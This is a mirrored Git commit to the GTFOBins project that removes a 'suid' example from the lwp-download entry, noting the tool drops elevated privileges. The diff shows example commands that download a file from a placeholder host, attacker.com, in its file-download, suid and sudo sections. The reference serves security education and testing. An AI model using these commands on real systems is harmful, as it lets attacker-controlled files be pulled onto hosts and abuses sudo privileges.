1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-07 20:50:38 +02:00

Update lwp-download.md

lwp-download drop the elevated privileges
This commit is contained in:
LinuxSploit 2021-04-16 06:36:34 -04:00 committed by Andrea Cardaci
parent 494ea89794
commit 313a49d9f7

View File

@ -6,11 +6,6 @@ functions:
URL=http://attacker.com/file_to_get
LFILE=file_to_save
lwp-download $URL $LFILE
suid:
- code: |
URL=http://attacker.com/file_to_get
LFILE=file_to_save
./lwp-download $URL $LFILE
sudo:
- code: |
URL=http://attacker.com/file_to_get